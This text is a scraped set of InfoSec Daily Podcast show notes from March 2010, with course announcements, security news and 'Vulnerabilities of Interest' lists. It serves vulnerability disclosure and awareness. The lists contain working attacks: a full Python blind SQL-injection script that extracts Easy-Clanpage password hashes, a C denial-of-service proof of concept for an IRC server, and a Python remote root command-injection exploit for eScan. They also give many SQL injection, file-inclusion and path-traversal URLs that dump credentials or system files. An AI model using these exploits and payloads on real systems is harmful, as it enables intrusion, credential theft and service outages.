The computer contained software that monitored the water pumps, reservoir and chlorine levels.”The software enables ease of operation,” Howatt said. “It allows the operator to log onto a screen and see what’s happening with the plant at any given time during the day.”  The following day, workers found the computer in a pond on the property. City officials said it’s destroyed, but a technician is trying to salvage the hard drive and the costly programming on it.

InfoSec Daily Podcast

 
ISD Podcast Episode 96 for March 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

• May 8, 2010 Jeffersonville,  Indiana
• (No URL for that as of yet)
• Proceeds with be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. justVisual 2.0 (index.php?p=) is subject to a Local File Inclusion (LFI) vulnerability.  Vulnerable code: <?php
      ob_start();//;print_r($_GET);
      error_reporting(E_ALL);
      function __autoload($class_name){
      $f=realpath(‘..’).’/classes/’.$class_name.’.php’;
      if (file_exists($f))
      require_once $f ;
      else {
      die(‘File ‘.$f.’ does not exist. Referer:
      ‘.(isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] :
      ‘none’).’<br/>’);
      }
      }
      Config::init();
      >
      $xmldb=XmlDb::getInstance();
      >
      $selfname=basename($_SERVER['PHP_SELF'],’.php’);
      if(isset($_GET['p']) && !empty($_GET['p'])) {
      //$selfname=basename($_GET['p'],’.php’);
      $selfname=str_replace(‘.php’,”,$_GET['p']);

      $filepath=dirname(dirname($_SERVER['SCRIPT_FILENAME'])).’/control/’.$selfn
      ame.’.php’;//echo
      $selfname;
      if(!file_exists($filepath)) {
      include ‘../control/defaultcontrol.php’;
      }
      else
      include ‘../control/’.$selfname.’.php’;
      }
      Proof of Concept is available: http://www.sample.com/index.php?p=[LFI]

   2. Joomla component com_universal (UWCMS Universal Web CMS) is subject to a Remote File Inclusion (RFI) vulnerability. This affects version 1.0.0.  Vulnerable code: /includes/config/config.html.php

      global $mosConfig_absolute_path;
      require_once($mosConfig_absolute_path.”/administrator/components/com_
      universal/includes/config/configuracion.php”);

      Proof of Concept is available: http://www.sample.com/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]

   3. N-13 News is subject to a File Disclosure vulnerability. Example URL is available: http://www.sample.com/modules/login.php?default_login_language={FILE}
   4. CF Image Hosting Script is subject to a File Disclosure vulnerability. Version 1.0 is impacted.  Example URL is available: http://www.sample.com/?img=../{FILE}
   5. Easy-Clanpage is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Easy-Clanpage 2.2 and versions prior to and including Easy-Clanpage 2.0 are vulnerable; other versions may be affected as well.Example URL is available: http://www.sample.com/[path]/?section=user&amp;action=details&amp;id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
      http://www.sample.com/ecp_version2/?section=user&amp;action=details&amp;func=stats&amp;id=1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))&gt;1

      The following exploit is available:
      #!/usr/bin/env python
      #-*- coding:utf-8 -*-
      import sys, urllib2, getopt

      def out(str):
      sys.stdout.write(str)
      sys.stdout.flush()

      class Exploit:
      charset = “0123456789abcdefABCDEF”
      url = “”
      charn = 1
      id = 1
      table_prefix = “”
      table_field = “”
      passwd = “”
      columns = []
      find_passwd = True

      def __init__(self):
      if len(sys.argv) < 2:
      print “*****************************************************************************”
      print “******************** Easy-Clanpage V2.0 Profil Page Hack ********************”
      print “*****************************************************************************”
      print “*                Discovered and vulnerability by Easy Laster                *”
      print “*                             coded by Dr.ChAoS                             *”
      print “*****************************************************************************”
      print “* Usage:                                                                    *”
      print “* python exploit.py [OPTION...] [SWITCH...] <url>                           *”
      print “*                                                                           *”
      print “* Example:                                                                  *”
      print “*                                                                           *”
      print “* Get the password of the user with id 2:                                   *”
      print “* python exploit.py -id 2 http://site.de/ecp/                               *”
      print “*                                                                           *”
      print “* Get email and username of id 1:                                           *”
      print “* python exploit.py -columns 80:email,25:username -nopw http://site.de/ecp/ *”
      print “*                                                                           *”
      print “* Switches:                                                                 *”
      print “* –nopw                                  Search no password                *”
      print “*                                                                           *”
      print “* Options:                                                                  *”
      print “* –id=<user id>                          User id                           *”
      print “* –prefix=<table prefix>                 Table prefix of ECP               *”
      print “* –columns=<max_chars:column_name,…>   Get value of any column you want  *”
      print “*****************************************************************************”
      exit()
      opts, switches = getopt.getopt(sys.argv[1:], “”, ["id=", "prefix=", "columns=", "nopw"])
      for opt in opts:
      if opt[0] == “–id”:
      self.id = int(opt[1])
      elif opt[0] == “–prefix”:
      self.table_prefix = opt[1]
      elif opt[0] == “–columns”:
      for col in opt[1].split(“,”):
      max, name = col.split(“:”)
      self.columns.append([max, name, ""])
      elif opt[0] == “–nopw”:
      self.find_passwd = False
      for switch in switches:
      if switch[:4] == “http”:
      if switch[-1:] == “/”:
      self.url = switch
      else:
      self.url = switch + “/”
      def generate_url(self, ascii):
      return self.url + “index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20″ + self.table_field + “%20FROM%20″ + self.table_prefix + “ecp_user%20WHERE%20userID=” + str(self.id) + “%20LIMIT%200,1),” + str(self.charn) + “,1))%3E” + str(ord(ascii))
      def start(self):
      print “Exploiting…”
      if self.find_passwd:
      self.password()
      if len(self.columns) > 0:
      self.read_columns()
      print “All finished!\n”
      print “—— Results ——”
      if len(self.columns) > 0:
      for v in self.columns:
      print “Column \”" + v[1] + “\”: ” + v[2]
      if self.find_passwd:
      if len(self.passwd) == 32:
      print “Password: ” + self.passwd
      else:
      print “Password not found!”
      print “——————–”
      def read_columns(self):
      end = False
      charrange = [0]
      charrange.extend(range(32, 256))
      for i in range(len(self.columns)):
      out(“Getting value of \”" + self.columns[i][1] + “\”: “)
      self.table_field = self.columns[i][1]
      for pwc in range(1, int(self.columns[i][0]) + 1):
      if end == True:
      break
      self.charn = pwc
      end = False
      for c in charrange:
      src = urllib2.urlopen(self.generate_url(chr(c))).read()
      if “<b>Warning</b>:  mysql_result() [" in src:
      if c == 0:
      end = True
      else:
      self.columns[i][2] += chr(c)
      out(chr(c))
      break
      out(“\n”)
      def password(self):
      out(“Getting password: “)
      self.table_field = “password”
      for pwc in range(1, 33):
      self.charn = pwc
      for c in self.charset:
      src = urllib2.urlopen(self.generate_url(c)).read()
      if “<b>Warning</b>:  mysql_result() [" in src:
      self.passwd += c
      out(c)
      break
      out("\n")

      exploit = Exploit()
      exploit.start()

   6. JINAIS is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition. INAIS 0.1.8 is vulnerable; other versions may also be affected. Exploit code is available:
      /*
      Jinais IRC Server 0.1.8 - NULL Pointer PoC

      This PoC will disconnect the affected target IRC server using
      a NULL Pointer vulnerability.

      Copyright 2010 Salvatore Fresta aka Drosophila

      This program is free software; you can redistribute it and/or
      modify it under the terms of  the  GNU General Public License
      as published by the  Free Software Foundation; either version
      2 of the License, or (at your option) any later version.

      This program  is  distributed  in the hope  that  it  will be
      useful, but WITHOUT ANY WARRANTY;  without  even the  implied
      warranty  of  MERCHANTABILITY  or  FITNESS  FOR  A PARTICULAR
      PURPOSE. See the GNU General Public License for more details.

      You should have  received a copy  of  the  GNU General Public
      License along  with  this program;  if not, write to the Free
      Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
      MA 02111-1307 USA

      http://www.gnu.org/licenses/gpl-2.0.txt

      */

      #include <stdio.h>
      #include <string.h>
      #include <getopt.h>
      #include <stdlib.h>
      #include <time.h>
      #ifdef WIN32
      #include <winsock.h>
      #define close closesocket
      #else
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <unistd.h>
      #include <errno.h>
      #include <netdb.h>
      #endif

      #define BUFF_SIZE 256
      #define DEFAULT_PORT 4002

      int socket_connect(char *server, int port);
      char *socket_receive(int sock, int tout);
      int socket_send(int socket, char *buffer, size_t size);
      int socket_close(int socket);

      int main(int argc, char *argv[]) {

      int sd,
      rnd_num,
      len,
      port = DEFAULT_PORT;
      char pkg[BUFF_SIZE],
      *response = NULL,
      *host = NULL;

      if(argc < 2) {
      printf(“\nJinais IRC Server 0.1.8 NULL Pointer PoC – (c) Salvatore Fresta”
      “\nhttp://www.salvatorefresta.net”
      “\n”
      “\nUsage: %s <target_hostname> <port> (default: %d)\n\n”, argv[0], port);
      return -1;
      }

      srand(time(NULL));

      host = argv[1];
      if(argc > 2) port = atoi(argv[2]);

      printf(“\nJinais IRC Server 0.1.8 NULL Pointer PoC – (c) Salvatore Fresta”
      “\nhttp://www.salvatorefresta.net”
      “\n\n[*] Connecting to %s:%hu…”, host, port);

      sd = socket_connect(host, port);
      if(sd < 0) {
      printf(“\n[-] Error on connect!\n\n”);
      return -1;
      }

      printf(“\n[+] Connection estabilished”
      “\n[*] Loggin to IRC server…”);

      login:

      rnd_num = rand()%100+1;

      len = snprintf(pkg, sizeof(pkg), “NICK randomnickname%d\r\n”, rnd_num);
      if(len < 0 || len > sizeof(pkg)) {
      perror(“\n[-] Error: snprintf”);
      socket_close(sd);
      return -1;
      }

      if(socket_send(sd, pkg, len) < 0) {
      perror(“\n[-] Error: socket_send”);
      socket_close(sd);
      return -1;
      }

      response = socket_receive(sd, 3);
      if(!response) {
      perror(“\n[-] Error: socket_receive”);
      socket_close(sd);
      return -1;
      }

      if(strstr(response, “Nickname is already in use”)) {
      free(response);
      goto login;
      }
      free(response);

      printf(“\n[+] Login successfully”
      “\n[*] Data sending…”);

      rnd_num = rand()%100+1;
      len = snprintf(pkg, sizeof(pkg), “USER blabla\r\nTOPIC #ch%d\r\n”, rnd_num);
      if(len < 0 || len > sizeof(pkg)) {
      perror(“\n[-] Error: snprintf”);
      socket_close(sd);
      return -1;
      }

      if(socket_send(sd, pkg, len) < 0) {
      perror(“\n[-] Error: socket_send”);
      socket_close(sd);
      return -1;
      }

      response = socket_receive(sd, 3);
      if(!response) {
      perror(“\n[-] Error: socket_receive”);
      socket_close(sd);
      return -1;
      }

      socket_close(sd);

      printf(“\n[+] Data sent successfully”
      “\n[+] Connection closed\n\n”);

      return 0;

      }

      int socket_connect(char *server, int port) {

      int sd;
      struct sockaddr_in sock;
      struct hostent *host = NULL;

      #ifdef WIN32
      WSADATA wsadata;
      if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
      #endif

      memset(&sock, 0, sizeof(sock));

      if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;

      sock.sin_family = AF_INET;
      sock.sin_port = htons(port);

      if(!(host=gethostbyname(server))) return -1;

      sock.sin_addr = *((struct in_addr *)host->h_addr);

      if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;

      return sd;

      }

      char *socket_receive(int sock, int tout) {

      int ret,
      byte_recv,
      oldpkglen = 0,
      pkglen = 0;
      char *buffer = NULL,
      tmp[128];
      struct timeval timeout;
      fd_set input;

      if(sock < 0) return NULL;

      while (1) {

      FD_ZERO(&input);
      FD_SET(sock, &input);

      if(tout > 0) {
      timeout.tv_sec  = tout;
      timeout.tv_usec = 0;
      ret = select(sock + 1, &input, NULL, NULL, &timeout);
      }
      else
      ret = select(sock + 1, &input, NULL, NULL, NULL);

      if (!ret) break;
      if (ret < 0) return NULL;

      byte_recv = recv(sock, tmp, sizeof(tmp), 0);

      if(byte_recv < 0) return NULL;

      if(!byte_recv) break;

      oldpkglen = pkglen;
      pkglen += byte_recv;

      buffer = (char *) realloc(buffer, pkglen+1);

      if(!buffer) return NULL;

      memcpy(buffer+oldpkglen, tmp, byte_recv);

      }

      if(buffer) buffer[pkglen] = 0;

      return buffer;

      }

      int socket_send(int socket, char *buffer, size_t size) {

      if(socket < 0) return -1;

      return send(socket, buffer, size, 0) < 0 ? -1 : 0;

      }

      int socket_close(int socket) {

      if(socket < 0) return -1;

      return close(socket) < 0 ? -1 : 0;

      }

   7. New-CMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. New-CMS 1.21 and prior are vulnerable. Example URL is available: http://www.sample.com/index.php?pg=[LFI]
   8. From the Pwn2Own Contest: Microsoft Internet Explorer is subject to multiple unspecified remote code-execution vulnerabilities. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. The vulnerabilities affect Internet Explorer 8; other versions may be vulnerable as well. The researcher responsible for discovering these issues has developed exploit code to trigger the vulnerabilities. This exploit code is not known to be publicly available.
   9. From the Pwn2Own Contest: Apple Safari is prone to an unspecified remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. This vulnerability affects Apple Safari 4 versions running on the Mac OS X platform; other versions may be vulnerable as well. The researcher responsible for discovering this issue has developed exploit code to trigger this vulnerability. This exploit code is not known to be publicly available.

Stories of Interest:
News item 1: http://www.wired.com/threatlevel/2010/03/tjx-sentencing/
Convicted TJX hacker Albert Gonzalez was sentenced to 20 years in prison on Thursday for leading a gang of cyberthieves who stole more than 90 million credit and debit card numbers from TJX and other retailers.

The sentence for the largest computer-crime case ever prosecuted is the lengthiest ever imposed in the United States for hacking or identity-theft. Gonzalez was also fined $25,000. Restitution, which will likely be in the tens of millions, was not decided Thursday.

Clean-cut, wearing a beige jail uniform and wireframe glasses, the 28-year-old Gonzalez sat motionless at his chair during Thursday’s proceedings, his hands folded in front of him.

Before the sentence was pronounced, Gonzalez told the court he deeply regrets his crimes, and is remorseful for having taken advantage of the personal relationships he’d forged. “Particularly one I had with a certain government agency – that gave me a second chance in life,” said the hacker, who had worked as a paid informant for the Secret Service. “I blame nobody but myself.”

News item 2: http://www.nytimes.com/2010/03/21/world/asia/21grid.html
It came as a surprise this month to Wang Jianwei, a graduate engineering student in Liaoning, China, that he had been described as a potential cyberwarrior before the United States Congress.

Larry M. Wortzel, a military strategist and China specialist, told the House Foreign Affairs Committee on March 10th that it should be concerned because “Chinese researchers at the Institute of Systems Engineering of Dalian University of Technology published a paper on how to attack a small U.S. power grid sub-network in a way that would cause a cascading failure of the entire U.S.”

When reached by telephone, Mr. Wang said he and his professor had indeed published “Cascade-Based Attack Vulnerability on the U.S. Power Grid” in an international journal called Safety Science last spring. But Mr. Wang said he had simply been trying to find ways to enhance the stability of power grids by exploring potential vulnerabilities.

“We usually say ‘attack’ so you can see what would happen,” he said. “My emphasis is on how you can protect this. My goal is to find a solution to make the network safer and better protected.” And independent American scientists who read his paper said it was true: Mr. Wang’s work was a conventional technical exercise that in no way could be used to take down a power grid.

News item 3: http://www.computerworld.com/s/article/9174078/iPhone_Safari_IE8_Firefox_all_fall_on_day_one_of_Pwn2Own?taxonomyId=17
Hackers took down Apple’s iPhone and Safari browser, Microsoft’s Internet Explore 8 (IE8) and Mozilla’s Firefox within minutes at today’s Pwn2Own contest, as expected.

The two-man team of Vincenzo Iozzo and Ralf-Philipp Weinmann exploited the iPhone in under five minutes, said a spokeswoman for 3Com TippingPoint, the security company that sponsored the contest. The pair also walked away with $15,000 in cash, a record prize for the challenge, which is in its fourth year.

Iozzo, an Italian college student, works for Zynamics GmbH, the company headed by noted researcher Thomas Dullien, better known as Halvar Flake, while Weinmann is a post-doctoral researcher at the Laboratory of Algorithms, Cryptology and Security at the University of Luxembourg.

Weinmann is probably best known for being part of a three-man team that in 2007 demonstrated how to crack the Wi-Fi security protocol WEP much faster than previously thought possible.

News item 4: https://www.infosecisland.com/articleview/3392-Durex-condom-orders-exposed-on-the-Internet.html

Earlier we talked about a security problem involving the web site of a Durex product. On March 5, a customer reportedly discovered that anyone could view his and other customers’ orders on the kohinoorpassion.com web site by simply inserting a different order ID number in the url without any login required. Names, addresses, phone numbers, and type of products ordered were all there for ready viewing. The orders had not been placed on the kohninoorpassion.com web site, but on the Durex India e-store site.

From what the customer could determine, the earliest order exposed online dated back to February 23, 2009, but there is no confirmation as to for how long the customer records might have been accessible without a login. According to the customer’s web site about the breach, no credit card or financial data were exposed.

The customer reported that he promptly contacted TTK-LIG (the marketer of the Durex brand in India and manufacturer of Kohinoor condoms) and SSL International (the owner of the Durex brand worldwide) about the problem and that by the next day, the site appeared to be better secured. But that wasn’t the end of the story, it seems. The customer created his own web site and FAQ about the breach and has been updating it since then. A review of the updates suggest that things took an ugly turn within a matter of weeks.

InfoSec Daily Podcast

 
ISD Podcast Episode 95 for March 25, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

April 15th – 18th, 2010 Cleveland, Ohio
http://notacon.org/
Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class
May 8, 2010 Jeffersonville,  Indiana

(No URL for that as of yet)
Proceeds with be going to the Hackers for Charity Food For Work Program
Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. uhttp Server is subject to a Path Traversal vulnerability. Version 0.1.0-alpha is affected, though others may be as well.  The problem is in the management of the bad chars that can be used to launch some attacks, such as the directory traversal. The path traversal sequence (‘../’) is not checked, so it can be used for seeking the directories of the affected system.  Example URL is available: http://www.sample.com/GET /../../../../../../etc/passwd HTTP/1.1
2. Harris Stratex 2100 subscriber station is subject to a Cross Site Request Forgery vulnerability.  This vulnerability would allow an attacker to view the running configuration without authentication.  Version 3.0.4.1.7.C is impacted.  Example HTML code is available:
   <html>
   <body>
   <body xonload=”config.submit();”>
   <form method=”get”
   action=”http:192.168.1.1/frameCmd6.html”>
   <input value=”Current
   Configuration”>
   </form>
   </body>
   </html>
3. The Joomla Component com_gds is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_gds&task=store&Storeid=-1+UNION+SELECT+1,2,3,4,5,6–
4. The Joomla Component com_cx is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41–
5. The Joomla Component J!Research is subject to a Local File Inclusion (LFI) vulnerability.  This could be exploited by an attacker to expose sensitive data.  Example URL is available: http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
6. The Joomla Component com_cb is subject to a SQL Injection vulnerability because it fails to santize user supplied inputs used in a SQL query.  Example URL is available: http://www.sample.com/index.php?option=com_cb&task=list&cat=-1+UNION+SELECT+1,2,3,4,5–.
7. The Joomla Component SMEStorage is subject to a Local File Inclusion (LFI) vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_smestorage&controller=[LFI]%00
8. The Joomla Component com_jwmmxtd is subject to a Remote File Inclusion (RFI) vulnerability.  Example URL is available: http://www.sample.com/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= [inj3ct0r]

OuterZone Review

http://dc949.org/projects/floodgate/

InfoSec Daily Podcast

 
ISD Podcast Episode 94 for March 24, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. Webmatic is subject to a Cross Site Scripting vulnerability. This flaw exists because the application does not validate multiple variables and form fields upon submission to the ‘index.php’ script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user’s browser within the trust relationship between the browser and the server, leading to a loss of integrity. Version 3.0.3 is impacted, though it is possible that prior versions may be affected as well.  To exploit a cross-site scripting issue, the attacker must entice an unsuspecting user to follow a malicious URL.
2. Fw-BofF (oolime-resurrection) is subject to Multiple Remote Include Vulnerabilities. Version 1.5.3beta is impacted, though it is posible that prior versions may be affected as well.  Example RFI URL is available:

   http://www.sample.com/core/dispatcher.php?configRootDir=[Shell]

   Example LFI URL is available: http://www.sample.com/core/database.php?configDBchoice=[LFI%00]

3. The PHP-Kit b-day.php add-on is subject to a SQL injection vulnerability because the application fails to sufficently sanitize user supplied input used in a query. Example URL is available:

   http://www.sample.com/include.php?path=bday.phpausgabe=11+uNIoN+sElECt+1,concat(user_name,0x3a,user_pw),3,4,5,6+from+phpkit_user+where+user_id=1–

4. PowieSys is subject to a index.php (shownews) SQL Injection Vulnerability. Version 0.7.7 alpha is impacted as well as all prior versions.  Example URL is available:

   http://www.sample.com/news/index.php?shownews=999999′+union+select+1,2,3,4,concat(nickname,0x3a,pwd,0x3a,email),6,7,8,9,10,11,12,13+from+powie_pfuser+where+id=1–+

5. Aris AGX agXchange ESM is subject to an Open Redirection Vulnerability. Exploitation of this vulnerability results in the redirection of users using a malicious link.  Example URL is available:

   http://www.sample.com/[agx_application]/pages/ucschcancelproc.jsp?returnpage=http://www.RedirectExample.com

6. Yupi CMS is subject to a Remote File Inclusion (RFI) vulnerability. Exploitation of this vulnerability results in the redirection of users using a malicious link.  Version 0.44 is impacted.  Example URL is available:

   http://www.sample.com/filemanager/connectors/php/config.php?clientDir=[inj3ct0r]

7. RepairShop2 is subject to a Cross Site Scripting vulnerability. This flaw exists because the application does not validate multiple variables and form fields upon submission. Version 1.9.023 is impacted.  Example URL is available:

   http://www.sample.com/shop/?b=products.details&prod=[INDONESIANCODER]

8. Zephyrus CMS is subject to a remote SQL injection vulnerability. This flaw exists because the application fails to sufficiently santize user supplied inputs in a SQL query. Example URL is available:
   http://www.sample.com/index.php?pagina=news&id=[SQL Injection]
9. Xataface is subject to a Admin Auth Bypass vulnerability. Exploiting this could allow an attacker to could edit/delete/create records in the database, create new admin accounts and view all the users and passwords. Example URL is available:

   http://www.sample.com/admin.php?-action=view&-table=Users&-cursor=0&amp;-skip=0&-limit=30&-mode=list

10. Multiple MicroWorld eScan products are vulnerable to a remote command-execution vulnerability because they fail to properly sanitize user-supplied input.  Attackers can exploit this issue to execute arbitrary commands with superuser privileges. Successful attacks will completely compromise affected computers. The issue affects the following products versions prior to 4.1.x of eScan for Linux Desktop,
    eScan for Linux File Servers, MailScan for Linux Mailservers and WebScan for Linux Proxy Servers.  Exploit code is available:
    #!/usr/bin/env python
    import sys
    from socket import *

    #auther: Mohammed almutairi
    #(Sa.attacker@gmail.com)
    “”"
    MicroWorld eScan Antivirus < 3.x  Remote Root Command Execution
    Package MWADMIN package vulnerabilities (linux)
    The Base Packages (MWADMIN and MWAV) must be installed before eScan
    Link:

    http://www.escanav.com/english/content/products/escan_linux/linux_products.asp

    infcted: aLL version 3.X eScan linux
    1-Escan for Linux Desktop
    2-Escan for Linux file Servers
    3-MailScan for Linux and webscan
    Tested On RedHat  and Fedora
    ULTRA PRIV8

    Description:

    From /opt/MicroWorld/var/www/htdocs/forgotpassword.php:
    include(“common_functions.php”);  <—> (1)

    if ($_POST['forgot'] == “Send Password”)
    {
    $user = $_POST["uname"]; <—>(2) insecure:(

    vulnerable code in forgotpassword.php and common_functions.php
    in (1) $runasroot = “/opt/MicroWorld/sbin/runasroot”;
    we can injection through via the file forgotpassword.php As you can see (2)
    with  remote root Command Execution
    >> eScan.py www.***.com
    eScan@/bin/sh:$Sa$ => reboot
    [*] Done! sent to: www.***.com
    “”"

    def xpl():
    if len(sys.argv) < 2:
    print “[*] MicroWorld eScan Antivirus Remote Root Command Execution”
    print “[*] exploited by Mohammed almutairi”
    print “[*] usage: %s host” % sys.argv[0]
    return

    host = sys.argv[1]
    port = 10080 # default port
    cmd = raw_input(“eScan@/bin/sh:$Sa$ => “)
    sock=socket(AF_INET, SOCK_STREAM)
    sock.connect((host,port))
    sh=”/opt/MicroWorld/sbin/runasroot /bin/sh -c ‘%s’” % cmd

    sa= “uname=;%s;” %sh # (;sh;)  —> Here Play See to ^(2)^
    sa+= “&forgot=Send+Password”

    s=”POST /forgotpassword.php HTTP/1.1\r\n”
    s+=”Host: %s:%d\r\n”%(host, port)
    s+=”User-Agent: */*\r\n”
    s+=”Accept: ar,en-us;q=0.7,en;q=0.3\r\n”
    s+=”Content-Type: application/x-www-form-urlencoded\r\n”
    s+=”Content-Length: %d \r\n\r\n”%len(sa)
    s+=sa

    sock.sendall(s)
    print “[*] Done! sent to: %s” % host
    sock.close()

    if __name__==”__main__”:
    xpl()
    sys.exit(0)

11. The ‘com_jresearch’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.  Example URL is available: http://www.sample.com/index.php?option=com_jresearch&amp;controller=../../../../../../../../../../proc/self/environ%00
12. Astaro Security Linux is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The issue affects Astaro Security Linux 5; other versions may also be affected. Example POST data is available: username=my@example.com&amp;password=DTC&amp;SID=&gt;”&gt;&lt;script&gt;alert(“XSS !!!”)&lt;/script&gt;&amp;cur_width=1&amp;window_height=700&amp;id=0121&amp;jaction=none&amp;frameset=active&amp;new_id=0
13. Uiga Fan Club, Personal Portal and Business Portal are subject to an SQL-injection vulnerability because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the applications, access or modify data, or exploit latent vulnerabilities in the underlying database.  Example URL is available: http://www.sample.com/forum/uigabusinessportal/index.php?view=photos&amp;id=1
    +union+select+1,2,concat(user_id,0x3a,username,0x3a,password),4,5+from+tbl_user+where+user_id=1n–

Stories of Interest:
News item 1: http://fcw.com/articles/2010/03/19/einstein-3-test-intrusion-prevention-system.aspx
The Homeland Security Department plans to partner with a commercial Internet Service Provider and another government agency to pilot technology developed by the National Security Agency to automate the process of detecting cyber intrusions into civilian agencies. systems, making it possible to thwart the attacks before damage is done.

